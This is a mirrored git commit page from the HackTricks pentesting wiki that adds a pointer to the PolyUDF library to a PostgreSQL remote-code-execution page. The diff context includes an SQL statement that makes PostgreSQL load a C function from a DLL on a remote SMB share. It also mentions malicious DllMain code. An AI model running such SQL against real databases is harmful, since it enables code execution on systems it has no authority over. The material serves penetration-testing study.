mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
Merge pull request #887 from Lamisedaxeh/patch-1
Adding PolyUDF project to the postgresql rce page
This commit is contained in:
commit
deda63acf1
1 changed files with 2 additions and 0 deletions
|
@ -288,6 +288,8 @@ Note how in this case the **malicious code is inside the DllMain function**. Thi
|
||||||
CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
|
CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
The [PolyUDF project](https://github.com/rop-la/PolyUDF) is also a good starting point with the full MS Visual Studio project and a ready to use library (including: _command eval_, _exec_ and _cleanup_) with multiversion support.
|
||||||
|
|
||||||
### RCE in newest Prostgres versions
|
### RCE in newest Prostgres versions
|
||||||
|
|
||||||
In the **latest versions** of PostgreSQL, restrictions have been imposed where the `superuser` is **prohibited** from **loading** shared library files except from specific directories, such as `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix systems. These directories are **secured** against write operations by either the NETWORK\_SERVICE or postgres accounts.
|
In the **latest versions** of PostgreSQL, restrictions have been imposed where the `superuser` is **prohibited** from **loading** shared library files except from specific directories, such as `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix systems. These directories are **secured** against write operations by either the NETWORK\_SERVICE or postgres accounts.
|
||||||
|
|
Loading…
Reference in a new issue